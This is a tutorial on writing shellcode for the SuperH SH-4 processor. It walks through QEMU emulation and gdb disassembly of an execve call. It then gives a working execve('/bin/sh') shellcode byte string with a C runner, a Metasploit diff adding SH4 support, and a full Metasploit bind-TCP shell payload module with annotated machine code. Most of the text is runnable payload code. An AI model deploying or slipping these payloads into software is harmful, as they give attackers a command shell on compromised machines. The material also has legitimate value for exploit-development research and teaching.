# Description
A brief tutorial on SuperH4 architecture.
# Specs
SuperH Family :
http://www.renesas.com/media/products/mpumcu/superh/roadmap/shroadmap.gif
Source : http://www.renesas.com/products/mpumcu/superh/superh_landing.jsp
We will focus on the simple SH-4, also referred as SH7750 series. To start such an adventure we will need the precise description of this subtle architecture, and after some guessing we land at SuperH7750 Software Reference manual (http://documentation.renesas.com/eng/products/mpumcu/rej09b0318_sh_4sm.pdf).
There is, among other, the opcode list for this processor! As we won't make shellcodes on a sheet of paper, next step is to setup the whole environment. You have two possibilites here, boot your ultra rare superh machine, or emulate it with qemu. Let's describe the latter.
# Qemu setup
First thing to come in mind when you have to deal with uncommon architectures : google "aurel32 #REPLACE_WITH_ARCH". This debian man just made an awesome work by setting up debian qemu images for arm,........,sh4. So download the following files :
- http://people.debian.org/~aurel32/qemu/sh4/debian_sid_sh4_standard.qcow2
- http://people.debian.org/~aurel32/qemu/sh4/initrd.img-2.6.32-5-sh7751r
- http://people.debian.org/~aurel32/qemu/sh4/vmlinuz-2.6.32-5-sh7751r
By following the README, we launch qemu-system-sh4 with the following flags :
qemu-system-sh4 -M r2d -kernel vmlinuz-2.6.32-5-sh7751r -initrd initrd.img-2.6.32-5-sh7751r -hda debian_sid_sh4_standard.qcow2 -append "root=/dev/sda1 console=tty0 noiotrap" -net nic -net user -redir tcp:2222::22
Note that I added the tcp redirection to be able to ssh directly. Don't forget to "aptitude update && aptitude upgrade", as this is an old release you will have some stuff to update and unfortunately this emulated machine is slow as hell (btw you can fully read the specs in the meantime :).
http://community.qnx.com/sf/wiki/do/viewPage/projects.core_os/wiki/KernelSystemCall
# Shellcoding
First step, executing "/bin/sh" via a shellcode. Our architecture works essentially with registers, and according to the msdn documentation [1] we can identify their meaning :
R0 Return values
R1 Temp register
R2 Temp register
R3 Temp register
R4 First function argument
R5 Second function argument
R6 Third function argument
R7 Fourth function argument
R8 Permanent register
R9 Permanent register
R10 Permanent register
R11 Permanent register
R12 Permanent register
R13 Permanent register
R14 Default frame pointer
R15 Stack pointer
Now let's analyze how gcc compile a simple execve code :
root@debian-sh4:~# cat execve.c
void getshell()
{
char *str = "//bin/sh";
execve(str,0,0);
}
void main()
{
getshell();
}
root@debian-sh4:~# gcc execve.c -o execve -g
We load it into our sh4 gdb :
root@debian-sh4:~# gdb -q execve
Reading symbols from /root/execve...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x004004f8 <+0>: mov.l r14,@-r15
0x004004fa <+2>: sts.l pr,@-r15
0x004004fc <+4>: mov r15,r14
0x004004fe <+6>: mov.l 0x400510 <main+24>,r1 ! 0x4004c0 <getshell>
0x00400500 <+8>: jsr @r1
0x00400502 <+10>: nop
0x00400504 <+12>: mov r14,r15
0x00400506 <+14>: lds.l @r15+,pr
0x00400508 <+16>: mov.l @r15+,r14
0x0040050a <+18>: rts
0x0040050c <+20>: nop
0x0040050e <+22>: nop
0x00400510 <+24>: .word 0x04c0
0x00400512 <+26>: .word 0x0040
End of assembler dump.
Call to a subroutine is done via the instruction jsr @addr, next step, the disassembly of the "getshell" function
(gdb) disassemble getshell
Dump of assembler code for function getshell:
0x004004c0 <+0>: mov.l r14,@-r15
0x004004c2 <+2>: sts.l pr,@-r15
0x004004c4 <+4>: add #-4,r15
0x004004c6 <+6>: mov r15,r14
0x004004c8 <+8>: mov r14,r1
0x004004ca <+10>: add #-60,r1
0x004004cc <+12>: mov.l 0x4004f0 <getshell+48>,r2 ! 0x40063c
0x004004ce <+14>: mov.l r2,@(60,r1)
0x004004d0 <+16>: mov r14,r1
0x004004d2 <+18>: add #-60,r1
0x004004d4 <+20>: mov.l @(60,r1),r1
0x004004d6 <+22>: mov r1,r4
0x004004d8 <+24>: mov #0,r5
0x004004da <+26>: mov #0,r6
0x004004dc <+28>: mov.l 0x4004f4 <getshell+52>,r1 ! 0x400378 <execve@plt>
0x004004de <+30>: jsr @r1
0x004004e0 <+32>: nop
0x004004e2 <+34>: add #4,r14
0x004004e4 <+36>: mov r14,r15
0x004004e6 <+38>: lds.l @r15+,pr
0x004004e8 <+40>: mov.l @r15+,r14
0x004004ea <+42>: rts
0x004004ec <+44>: nop
0x004004ee <+46>: nop
0x004004f0 <+48>: mov.b @(r0,r3),r6
0x004004f2 <+50>: .word 0x0040
0x004004f4 <+52>: .word 0x0378
0x004004f6 <+54>: .word 0x0040
End of assembler dump.
Focusing on the execve function call, we can see that the address of our "/bin/sh" string is loaded in r4, then 0 in r5 and r6. In our shellcode we will only use syscalls to be as independant as possible. A step deeper, we have the execve@plt disassembly (not resolved) :
(gdb) disassemble execve
Dump of assembler code for function execve@plt:
0x00400378 <+0>: mov.l 0x40038c <execve@plt+20>,r0 ! 0x41076c <_GLOBAL_OFFSET_TABLE_+20>
0x0040037a <+2>: mov.l @r0,r0
0x0040037c <+4>: mov.l 0x400388 <execve@plt+16>,r1 ! 0x400324
0x0040037e <+6>: jmp @r0
0x00400380 <+8>: mov r1,r0
0x00400382 <+10>: mov.l 0x400390 <execve@plt+24>,r1 ! 0x18
0x00400384 <+12>: jmp @r0
0x00400386 <+14>: nop
0x00400388 <+16>: mov.b r2,@(r0,r3)
0x0040038a <+18>: .word 0x0040
0x0040038c <+20>: mov.b @(r0,r6),r7
0x0040038e <+22>: .word 0x0041
0x00400390 <+24>: sett
0x00400392 <+26>: .word 0x0000
End of assembler dump.
We run it one time to resolve :
(gdb) r
Starting program: /root/execve
Got object file from memory but can't read symbols: File format not recognized.
process 32715 is executing new program: /bin/dash
# exit
Program exited normally.
(gdb) disassemble execve
Dump of assembler code for function execve:
0x29625d40 <+0>: mov.l r12,@-r15
0x29625d42 <+2>: mova 0x29625d9c <execve+92>,r0
0x29625d44 <+4>: mov.l 0x29625d9c <execve+92>,r12 ! 0xb7a34
0x29625d46 <+6>: mov #11,r3
0x29625d48 <+8>: add r0,r12
0x29625d4a <+10>: trapa #19
0x29625d4c <+12>: or r0,r0
0x29625d4e <+14>: or r0,r0
0x29625d50 <+16>: or r0,r0
0x29625d52 <+18>: or r0,r0
0x29625d54 <+20>: or r0,r0
0x29625d56 <+22>: mov.w 0x29625d98 <execve+88>,r1 ! 0xf000
0x29625d58 <+24>: cmp/hi r1,r0
0x29625d5a <+26>: bt.s 0x29625d80 <execve+64>
0x29625d5c <+28>: mov r0,r3
0x29625d5e <+30>: rts
0x29625d60 <+32>: mov.l @r15+,r12
0x29625d62 <+34>: nop
....
0x29625d7e <+62>: nop
0x29625d80 <+64>: mov.l 0x29625d8c <execve+76>,r0 ! 0x198
0x29625d82 <+66>: stc gbr,r1
0x29625d84 <+68>: mov.l @(r0,r12),r0
0x29625d86 <+70>: bra 0x29625d90 <execve+80>
0x29625d88 <+72>: add r0,r1
0x29625d8a <+74>: nop
0x29625d8c <+76>: .word 0x0198
0x29625d8e <+78>: .word 0x0000
0x29625d90 <+80>: neg r3,r3
0x29625d92 <+82>: mov.l r3,@r1
0x29625d94 <+84>: bra 0x29625d5e <execve+30>
0x29625d96 <+86>: mov #-1,r0
0x29625d98 <+88>: fadd fr0,fr0
0x29625d9a <+90>: nop
0x29625d9c <+92>: add #52,r10
0x29625d9e <+94>: rts
End of assembler dump.
Better. This "trapa" instruction seems cool, with 11 in r3, let's see the execve syscall number :
root@debian-sh4:~# grep execve /usr/include/asm/unistd_32.h
#define __NR_execve 11
So r3 with the syscall number and r0 with the string address, perfect. Instructions are pretty limited and we can only push registers on the "stack", so to push a byte on the stack, it takes 4 bytes :
mov #imm, reg
mov reg,@-r15
First thought is to push bytes one by one (I am getting an error when putting immediate larger than 0xff) :
/*
* execve ("/bin/sh");
*
main:
add #-8, r15
mov r15, r4
mov #110, r2
shll8 r2
add #105, r2
shll8 r2
add #98, r2
shll8 r2
add #47, r2
mov.l r2, @r15
add #4, r15
xor r2, r2
shll8 r2
add #104, r2
shll8 r2
add #115, r2
shll8 r2
add #47, r2
mov.l r2, @r15
mov #11, r3
xor r5, r5
xor r6, r6
trapa #19
*/
#include <stdio.h>
#include <string.h>
char code[] =
"\xf8\x7f\xf3\x64\x6e\xe2\x18\x42\x69\x72\x18\x42\x62\x72\x18"
"\x42\x2f\x72\x22\x2f\x04\x7f\x2a\x22\x18\x42\x68\x72\x18\x42"
"\x73\x72\x18\x42\x2f\x72\x22\x2f\x0b\xe3\x5a\x25\x6a\x26\x13"
"\xc3";
int main()
{
printf("len:%d bytes\n", strlen(code));
(*(void(*)()) code)();
return 0;
}
But it is so fat! A ninja found another way to do it better here http://www.shell-storm.org/shellcode/files/shellcode-771.php, but this example focused on how to use the stack :)
# Metasploit ninja
We will add the SuperH4 architecture to metasploit :
% svn co https://www.metasploit.com/svn/framework3/trunk/
% svn diff
Index: lib/rex/constants.rb
===================================================================
--- lib/rex/constants.rb (révision 13017)
+++ lib/rex/constants.rb (copie de travail)
@@ -80,6 +80,9 @@
ARCH_TTY = 'tty'
ARCH_ARMLE = 'armle'
ARCH_ARMBE = 'armbe'
+ARCH_SH4 = 'sh4'
+ARCH_SH4LE = 'sh4le'
+ARCH_SH4BE = 'sh4be'
ARCH_JAVA = 'java'
ARCH_TYPES =
[
@@ -95,6 +98,9 @@
ARCH_SPARC,
ARCH_ARMLE,
ARCH_ARMBE,
+ ARCH_SH4,
+ ARCH_SH4LE,
+ ARCH_SH4BE,
ARCH_CMD,
ARCH_PHP,
ARCH_TTY,
Index: lib/rex/arch.rb
===================================================================
--- lib/rex/arch.rb (révision 13017)
+++ lib/rex/arch.rb (copie de travail)
@@ -63,6 +63,12 @@
[addr].pack('V')
when ARCH_ARMBE
[addr].pack('N')
+ when ARCH_SH4
+ [addr].pack('V')
+ when ARCH_SH4LE
+ [addr].pack('V')
+ when ARCH_SH4BE
+ [addr].pack('N')
end
end
The ARCH_SH4, ARCH_SH4BE and ARCH_SH4LE are now recognized by rex! As an example, we can simply create the metasploit module shell_bind_tcp.rb in modules/payloads/singles/linux/sh4/shell_bind_tcp.rb :
##
# $Id: shell_reverse_tcp.rb 12196 2011-04-01 00:51:33Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Inline',
'Version' => '$Revision: 1 $',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'Dad`',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_SH4,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'LPORT' => [ 116, 'n' ],
},
'Payload' =>
#### Tested successfully on:
# Linux debian-sh4 2.6.39-2-sh7751r
####
# s = socket(2, 1, 0)
"\x66\xe3" +# mov #102,r3
"\x02\xe4" +# mov #2,r4
"\x01\xe5" +# mov #1,r5
"\x6a\x26" +# xor r6,r6
"\x66\x2f" +# mov.l r6,@-r15
"\x56\x2f" +# mov.l r5,@-r15
"\x46\x2f" +# mov.l r4,@-r15
"\x01\xe4" +# mov #1,r4
"\xf3\x65" +# mov r15,r5
"\x13\xc3" +# trapa #19
# bind(s, {2, port, 16}, 16)
"\x03\x64" +# mov r0,r4
"\x03\x68" +# mov r0,r8
"\x2a\x22" +# xor r2,r2
"\x26\x2f" +# mov.l r2,@-r15
"\x15\xc7" +# mova 4000c8 <dup+0x18>,r0
"\x01\x62" +# mov.w @r0,r2
"\x28\x42" +# shll16 r2
"\x02\x72" +# add #2,r2
"\x26\x2f" +# mov.l r2,@-r15
"\xf3\x65" +# mov r15,r5
"\x10\xe6" +# mov #16,r6
"\x66\x2f" +# mov.l r6,@-r15
"\x56\x2f" +# mov.l r5,@-r15
"\x46\x2f" +# mov.l r4,@-r15
"\x02\xe4" +# mov #2,r4
"\xf3\x65" +# mov r15,r5
"\x13\xc3" +# trapa #19
# listen(s, 0)
"\x83\x64" +# mov r8,r4
"\x5a\x25" +# xor r5,r5
"\x6a\x26" +# xor r6,r6
"\x66\x2f" +# mov.l r6,@-r15
"\x56\x2f" +# mov.l r5,@-r15
"\x46\x2f" +# mov.l r4,@-r15
"\x04\xe4" +# mov #4,r4
"\xf3\x65" +# mov r15,r5
"\x13\xc3" +# trapa #19
# fd = accept(s, 0, 0)
"\x83\x64" +# mov r8,r4
"\x5a\x25" +# xor r5,r5
"\x66\x2f" +# mov.l r6,@-r15
"\x56\x2f" +# mov.l r5,@-r15
"\x46\x2f" +# mov.l r4,@-r15
"\x05\xe4" +# mov #5,r4
"\xf3\x65" +# mov r15,r5
"\x13\xc3" +# trapa #19
# dup2(fd, 2-1-0)
"\x03\x69" +# mov r0,r9
"\x03\xea" +# mov #3,r10
# <dup>:
"\xff\x7a" +# add #-1,r10
"\x3f\xe3" +# mov #63,r3
"\x93\x64" +# mov r9,r4
"\xa3\x65" +# mov r10,r5
"\x13\xc3" +# trapa #19
"\x15\x4a" +# cmp/pl r10
"\xf8\x89" +# bt 4000b0 <dup>
# execve(shell, 0, 0)
"\x0b\xe3" +# mov #11,r3
"\x02\xc7" +# mova 4000cc <dup+0x1c>,r0
"\x03\x64" +# mov r0,r4
"\x5a\x25" +# xor r5,r5
"\x13\xc3" +# trapa #19
"\x00\x00" +# LPORT
"\xff\xff" +# Junk
"/bin/sh" # Shell
}
))
register_options(
[
OptString.new('SHELL', [ true, "Shell to execute.", "/bin/sh" ])
], self.class)
end
def generate
p = super
sh = datastore['SHELL']
p[120, sh.length] = sh
p
end
end
This is a simple example on how to perform a bind shell with a parametrable LPORT and SHELL. Their offsets are calculated relatively to the end. Note that I am using the socketcall syscall to handle the socket, listen, bind and accept commands. Arguments are pushed onto the stack respectively, then a pointer to this location is saved in r5, the syscall #63 is stored in r3 and finally r4 defines the action that socketcall should execute. Also, the dup2 over the three standards file descriptors is in a loop decrementing r10.
The shellcode is certainly far from optimal, but this is a first approach to this exotic architecture! I don't really know how to submit modules to metasploit framework, but if any of you knows ... :)
[1] http://msdn.microsoft.com/en-us/library/ms925519.aspx